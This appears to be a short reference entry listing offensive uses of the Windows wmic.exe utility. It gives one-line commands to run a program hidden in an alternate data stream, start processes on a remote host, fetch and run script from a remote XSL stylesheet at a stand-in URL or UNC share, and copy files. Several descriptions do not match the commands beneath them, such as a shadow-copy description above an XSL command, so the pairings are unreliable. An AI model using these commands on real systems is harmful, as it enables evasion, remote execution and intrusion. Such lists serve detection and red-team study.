The WMI command-line (WMIC) utility provides a command-line interface for WMI
Execute a .EXE file stored as an Alternate Data Stream (ADS)
wmic.exe process call create "C:\Windows\Temp\file.ext:program.exe"
Execute calc from wmic
wmic.exe process call create "cmd /c c:\windows\system32\calc.exe"
Execute evil.exe on the remote system.
wmic.exe /node:"192.168.0.1" process call create "cmd /c c:\windows\system32\calc.exe"
Create a volume shadow copy of NTDS.dit that can be copied.
wmic.exe process get brief /format:"https://www.example.org/file.xsl"
Executes JScript or VBScript embedded in the target remote XSL stylsheet.
wmic.exe process get brief /format:"\\servername\C$\Windows\Temp\file.xsl"
Copy file from source to destination.
wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"